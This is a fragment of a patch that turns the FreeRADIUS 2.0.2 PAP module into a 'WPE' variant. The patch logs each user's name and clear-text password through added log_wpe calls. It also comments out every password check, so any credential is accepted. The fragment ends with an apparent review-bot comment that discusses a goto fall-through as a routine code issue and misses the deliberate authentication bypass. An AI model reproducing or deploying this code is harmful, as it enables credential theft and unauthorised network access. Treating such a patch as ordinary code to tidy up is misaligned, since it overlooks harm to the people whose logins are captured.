mschapv1_challenge, - response->vp_octets + 26, nthashhash) < 0) { + response->vp_octets + 26, nthashhash, + username_string) < 0) { DEBUG2(" rlm_mschap: FAILED: MS-CHAP2-Response is incorrect"); mschap_add_reply(&request->reply->vps, *response->vp_octets, diff -ru freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c --- freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c 2007-12-28 23:38:19.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c 2008-02-15 19:37:35.000000000 -0500 
@@ -492,6 +492,10 @@ return RLM_MODULE_INVALID; } + /* WPE */ + log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue, + NULL, 0, NULL, 0); + /* * Clear-text passwords are the only ones we support. */ @@ -582,11 +586,14 @@ do_clear: DEBUG("rlm_pap: Using clear text password \"%s\"", vp->vp_strvalue); + /* WPE - always succeed */ + /* if (strcmp((char *) vp->vp_strvalue, (char *) request->password->vp_strvalue) != 0){ snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed"); goto make_msg; } + */ done: DEBUG("rlm_pap: User authenticated successfully"); return RLM_MODULE_OK; @@ -618,10 +625,13 @@ fr_MD5Update(&md5_context, request->password->vp_octets, request->password->length); fr_MD5Final(digest, &md5_context); + /* WPE - Always succeed */ + /* if (memcmp(digest, vp->vp_octets, vp->length) != 0) { snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed"); goto make_msg; } + */ goto done; break; @@ -645,10 +655,13 @@ /* * Compare only the MD5 hash results, not the salt. */ + /* WPE - always succeed */ + /* if (memcmp(digest, vp->vp_octets, 16) != 0) { snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed"); goto make_msg; } + */ goto done; break; @@ -667,10 +680,13 @@ fr_SHA1Update(&sha1_context, request->password->vp_octets, request->password->length); fr_SHA1Final(digest,&sha1_context); + /* WPE - Always succeed */ + /* if (memcmp(digest, vp->vp_octets, vp->length) != 0) { snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed"); goto make_msg; } + */ goto done; break; @@ -691,10 +707,13 @@ request->password->length); fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20); fr_SHA1Final(digest,&sha1_context); + /* WPE - Always succeed */ + /* if (memcmp(digest, vp->vp_octets, 20) != 0) { snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed"); goto make_msg; } + */ goto done; break; 
@@ -716,11 +735,14 @@ snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed"); goto make_msg; } + /* WPE - Always succeed */ + /* if ((fr_hex2bin(digest, digest, 16) != vp->length) || (memcmp(digest, vp->vp_octets, vp->length) != 0)) { snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed"); goto make_msg; } + */ goto done; break; @@ -741,16 +763,22 @@ snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed"); goto make_msg; } + /* WPE - Always succeed */ + /* if ((fr_hex2bin(digest, digest, 16) != vp->length) || (memcmp(digest, vp->vp_octets, vp->length) != 0)) { snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed"); + */ + make_msg: + /* DEBUG("rlm_pap: Passwords don't match"); module_fmsg_vp = pairmake("Module-Failure-Message", module_fmsg, T_OP_EQ); pairadd(&request->packet->vps, module_fmsg_vp); return RLM_MODULE_REJECT; } + */ goto done; break;
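Review bot: In the `@@ -741` hunk the `make_msg:` label is kept while the block after it is commented out, so the still-live `goto make_msg` that follows the `"rlm_pap: mschap xlat failed"` snprintf in these hunks now lands on `goto done;` and returns `RLM_MODULE_OK`: an internal xlat error becomes a silent success, and `module_fmsg` is filled but never attached to the request via `module_fmsg_vp`. Placing the label between two comment blocks, where the commented-out `if` and its closing `}` are hidden, also makes the brace structure hard to follow. If this fall-through is intended it should at least be recorded on the label, `/* failure path disabled: jumps here fall through to done */`, and an unused `module_fmsg_vp` will likely warn. The enclosing function starts and ends outside the hunk.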